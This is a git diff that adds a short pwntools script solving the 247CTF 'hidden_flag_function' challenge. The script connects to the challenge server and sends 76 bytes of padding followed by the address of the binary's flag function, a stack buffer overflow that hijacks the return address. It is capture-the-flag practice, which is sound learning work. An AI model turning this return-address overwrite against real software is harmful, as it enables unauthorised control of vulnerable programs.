diff --git a/247ctf/hidden_flag_function/a.py b/247ctf/hidden_flag_function/a.py
new file mode 100644
index 0000000..ed3350f
--- /dev/null
+++ b/247ctf/hidden_flag_function/a.py
@@ -0,0 +1,17 @@
+#!/usr/bin/python3
+
+from pwn import *
+
+context.binary = target = ELF("./hidden_flag_function", checksec=False)
+# r = process()
+r = remote("9fe3144560d92c37.247ctf.com", 50224)
+
+# funcs
+s = lambda a: r.sendlineafter(b"?", a)
+
+# buf
+buf = b"A"*76
+buf += p64(target.sym.flag)
+s(buf)
+
+r.interactive()
\ No newline at end of file